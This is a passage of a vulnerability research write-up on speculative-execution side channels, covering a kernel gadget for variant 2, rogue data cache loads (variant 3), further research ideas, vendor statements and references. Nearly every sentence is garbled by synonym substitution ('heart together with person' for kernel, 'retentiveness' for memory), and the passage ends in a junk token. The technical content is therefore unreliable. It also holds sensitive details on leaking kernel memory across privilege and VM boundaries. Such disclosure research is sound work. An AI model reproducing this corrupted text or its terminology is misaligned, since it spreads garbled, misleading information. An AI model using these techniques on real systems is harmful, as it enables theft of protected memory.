To telephone scream upwardly the interpreter entry point, a gadget that gives RSI together with RIP command given R8-R11 command together with controlled information at a known retentiveness location is necessary. The next gadget provides this functionality:

ffffffff81514edd: 4c 89 ce mov rsi,r9
ffffffff81514ee0: 41 ff xc b0 00 00 00 call QWORD PTR [r8+0xb0]

Now, past times pointing R8 together with R9 at the mapping of a guest-owned page inwards the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode inwards the host kernel. Then, relatively straightforward bytecode tin give the axe live used to leak information into the cache.

Variant 3: Rogue information cache load

Basically, read Anders Fogh's blogpost: https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/

In summary, an laid on using this variant of the number attempts to read heart together with person retentiveness from userspace without misdirecting the command menstruation of heart together with person code. This plant past times using the code pattern that was used for the previous variants, but inwards userspace. The underlying sentiment is that the permission cheque for accessing an address mightiness non live on the critical path for reading information from retentiveness to a register, where the permission cheque could withdraw hold meaning performance impact. Instead, the retentiveness read could brand the final result of the read available to next instructions right away together with exclusively perform the permission cheque asynchronously, setting a flag inwards the reorder buffer that causes an exception to live raised if the permission cheque fails.

We exercise withdraw hold a few additions to brand to Anders Fogh's blogpost:

"Imagine the next educational activity executed inwards usermode

mov rax,[somekernelmodeaddress]

It volition movement an interrupt when retired, [...]"

It is also possible to already execute that educational activity behind a high-latency mispredicted branch to avoid taking a page fault. This mightiness also widen the speculation window past times increasing the delay betwixt the read from a heart together with person address together with delivery of the associated exception.

"First, I telephone scream upwardly a syscall that touches this memory. Second, I exercise the prefetcht0 educational activity to improve my odds of having the address loaded inwards L1."

When nosotros used prefetch instructions after doing a syscall, the laid on stopped working for us, together with nosotros withdraw hold no clue why. Perhaps the CPU somehow stores whether access was denied on the lastly access together with prevents the laid on from working if that is the case?

"Fortunately I did non larn a wearisome read suggesting that Intel null’s the final result when the access is non allowed."

That (read from heart together with person address returns all-zeroes) seems to hap for retentiveness that is non sufficiently cached but for which pagetable entries are present, at to the lowest degree after repeated read attempts. For unmapped memory, the heart together with person address read does non render a final result at all.

Ideas for farther research

We believe that our inquiry provides many remaining inquiry topics that nosotros withdraw hold non yet investigated, together with nosotros encourage other world researchers to aspect into these.

This department contains an fifty-fifty higher amount of speculation than the residue of this blogpost - it contains untested ideas that mightiness good live useless.

Leaking without information cache timing

It would live interesting to explore whether at that spot are microarchitectural attacks other than measure information cache timing that tin give the axe live used for exfiltrating information out of speculative execution.

Other microarchitectures

Our inquiry was relatively Haswell-centric so far. It would live interesting to meet details e.g. on how the branch prediction of other modern processors plant together with how good it tin give the axe live attacked.

Other JIT engines

We developed a successful variant 1 laid on against the JIT engine built into the Linux kernel. It would live interesting to meet whether attacks against to a greater extent than advanced JIT engines amongst less command over the organisation are also practical - inwards particular, JavaScript engines.

More efficient scanning for host-virtual addresses together with cache sets

In variant 2, spell scanning for the host-virtual address of a guest-owned page, it mightiness brand feel to endeavor to determine its L3 cache laid first. This could live done past times performing L3 evictions using an eviction pattern through the physmap, so testing whether the eviction affected the guest-owned page.

The same mightiness piece of work for cache sets - exercise an L1D+L2 eviction laid to evict the role pointer inwards the host heart together with person context, exercise a gadget inwards the heart together with person to evict an L3 laid using physical addresses, so exercise that to seat which cache sets invitee lines belong to until a guest-owned eviction laid has been constructed.

Dumping the consummate BTB state

Given that the generic BTB seems to exclusively live able to distinguish 231-8 or fewer source addresses, it seems viable to dump out the consummate BTB nation generated past times e.g. a hypercall inwards a timeframe precisely about the guild of a few hours. (Scan for saltation sources, so for every discovered saltation source, bisect the saltation target.) This could potentially live used to seat the locations of functions inwards the host heart together with person fifty-fifty if the host heart together with person is custom-built.

The source address aliasing would trim down the usefulness somewhat, but because target addresses don't endure from that, it mightiness live possible to correlate (source,target) pairs from machines amongst different KASLR offsets together with trim down the number of candidate addresses based on KASLR beingness additive spell aliasing is bitwise.

This could so potentially let an aggressor to brand guesses nigh the host heart together with person version or the compiler used to build it based on saltation offsets or distances betwixt functions.

Variant 2: Leaking amongst to a greater extent than efficient gadgets

If sufficiently efficient gadgets are used for variant 2, it mightiness non live necessary to evict host heart together with person role pointers from the L3 cache at all; it mightiness live sufficient to exclusively evict them from L1D together with L2.

Various speedups

In special the variant 2 PoC is silent a fleck slow. This is in all probability partly because:

It exclusively leaks 1 fleck at a time; leaking to a greater extent than bits at a fourth dimension should live doable.
It heavily uses IRETQ for hiding command menstruation from the processor.

It would live interesting to meet what information leak charge per unit of measurement tin give the axe live achieved using variant 2.

Leaking or injection through the render predictor

If the render predictor also doesn't lose its nation on a privilege score change, it mightiness live useful for either locating the host heart together with person from within a VM (in which instance bisection could live used to real rapidly discovery the total address of the host kernel) or injecting render targets (in special if the render address is stored inwards a cache business that tin give the axe live flushed out past times the aggressor together with isn't reloaded earlier the render instruction).

However, nosotros withdraw hold non performed whatever experiments amongst the render predictor that yielded conclusive results so far.

Leaking information out of the indirect telephone scream upwardly predictor

We withdraw hold attempted to leak target information out of the indirect telephone scream upwardly predictor, but haven't been able to larn inwards work.

Vendor statements

The next disceptation were provided to us regarding this number from the vendors to whom disclosed this vulnerability:

Intel

Intel is committed to improving the overall safety of calculator systems. The methods described hither rely on mutual properties of modern microprocessors. Thus, susceptibility to these methods is non express to Intel processors, nor does it hateful that a processor is working exterior its intended functional specification. Intel is working closely amongst our ecosystem partners, every bit good every bit amongst other silicon vendors whose processors are affected, to blueprint together with distribute both software together with hardware mitigations for these methods.

For to a greater extent than information together with links to useful resources, visit:

https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr
http://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf

AMD

AMD provided the next link: http://www.amd.com/en/corporate/speculative-execution

ARM

Arm recognises that the speculation functionality of many modern high-performance processors, despite working every bit intended, tin give the axe live used inwards conjunction amongst the timing of cache operations to leak some information every bit described inwards this blog. Correspondingly, Arm has developed software mitigations that nosotros recommend live deployed.

Specific details regarding the affected processors together with mitigations tin give the axe live flora at this website: https://developer.arm.com/support/security-update

Arm has included a detailed technical whitepaper every bit good every bit links to information from some of Arm’s architecture partners regarding their specific implementations together with mitigations.

Literature

Note that some of these documents - inwards special Intel's documentation - alter over time, so quotes from together with references to it may non reverberate the latest version of Intel's documentation.

https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel's optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:

"Placing information right away next an indirect branch tin give the axe movement a performance problem. If the information consists of all zeros, it looks similar a long current of ADDs to retentiveness destinations together with this tin give the axe movement resources conflicts together with wearisome downward branch recovery. Also, information right away next indirect branches may appear every bit branches to the branch predication [sic] hardware, which tin give the axe branch off to execute other information pages. This tin give the axe Pb to subsequent self-modifying code problems."
"Loads can:[...]Be carried out speculatively, earlier preceding branches are resolved."
"Software should avoid writing to a code page inwards the same 1-KByte subpage that is beingness executed or fetching code inwards the same 2-KByte subpage of that is beingness written. In addition, sharing a page containing direct or speculatively executed code amongst some other processor every bit a information page tin give the axe trigger an SMC status that causes the entire pipeline of the machine together with the draw cache to live cleared. This is due to the self-modifying code condition."
"if mapped every bit WB or WT, at that spot is a potential for speculative processor reads to convey the information into the caches"
"Failure to map the part every bit WC may let the business to live speculatively read into the processor caches (via the wrong path of a mispredicted branch)."

https://software.intel.com/en-us/articles/intel-sdm: Intel's Software Developer Manuals
http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog's documentation of reverse-engineered processor demeanor together with relevant theory was real helpful for this research.
http://www.cs.binghamton.edu/ dima/micro16.pdf together with https://github.com/felixwilhelm/mario_baslr: Prior inquiry past times Dmitry Evtyushkin, Dmitry Ponomarev together with Nael Abu-Ghazaleh on abusing branch target buffer demeanor to leak addresses that nosotros used every bit a starting dot for analyzing the branch prediction of Haswell processors. Felix Wilhelm's inquiry based on this provided the basic sentiment behind variant 2.
https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js inquiry past times Daniel Gruss, Clémentine Maurice together with Stefan Mangard contains information nigh L3 cache eviction patterns that nosotros reused inwards the KVM PoC to evict a role pointer.
https://xania.org/201602/bpu-part-one: Matt Godbolt blogged nigh reverse-engineering the construction of the branch predictor on Intel processors.
https://www.sophia.re/thesis.pdf: Sophia D'Antoine wrote a thesis that shows that opcode scheduling tin give the axe theoretically live used to transmit information betwixt hyperthreads.
https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, together with Stefan Mangard wrote a newspaper on mitigating microarchitectural issues caused past times pagetable sharing betwixt userspace together with the kernel.
https://www.jilp.org/: This magazine contains many articles on branch prediction.
http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost past times Henry Wong investigates the L3 cache replacement policy used past times Intel's Ivy Bridge architecture.

References

[1] This initial written report did non comprise whatever information nigh variant 3. We had discussed whether direct reads from heart together with person retentiveness could work, but sentiment that it was unlikely. We subsequently tested together with reported variant 3 prior to the publication of Anders Fogh's piece of work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.

[2] The precise model names are listed inwards the department "Tested Processors". The code for reproducing this is inwards the writeup_files.tar archive inwards our bugtracker, inwards the folders userland_test_x86 together with userland_test_aarch64.

[3] The attacker-controlled offset used to perform an out-of-bounds access on an array past times this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window inwards the heart together with person heap area.

[4] This PoC won't piece of work on CPUs amongst SMAP support; however, that is non a commutation limitation.

[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available at http://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpg, Release, Packages.xz); that was the electrical current distro heart together with person version when I laid upwardly the machine. It is real unlikely that the PoC plant amongst other heart together with person versions without changes; it contains a number of hardcoded addresses/offsets.

[6] The telephone was running an Android build from May 2017.

[7] https://software.intel.com/en-us/articles/intel-sdm

[8] https://software.intel.com/en-us/articles/avoiding-and-identifying-false-sharing-among-threads, department "background"

[9] More than 215 mappings would live to a greater extent than efficient, but the heart together with person places a difficult cap of 216 on the number of VMAs that a procedure tin give the axe have.

[10] Intel's optimization manual states that "In the commencement implementation of HT Technology, the physical execution resources are shared together with the architecture nation is duplicated for each logical processor", so it would live plausible for predictor nation to live shared. While predictor nation could live tagged past times logical core, that would probable trim down performance for multithreaded processes, so it doesn't seem likely.

[11] In instance the history buffer was a fleck bigger than nosotros had measured, nosotros added some margin - inwards special because nosotros had seen slightly different history buffer lengths inwards different experiments, together with because 26 isn't a real circular number.

[12] The basic sentiment comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, department IV, although the authors of that newspaper silent used hugepages.

plantillasnowcrystalsdelui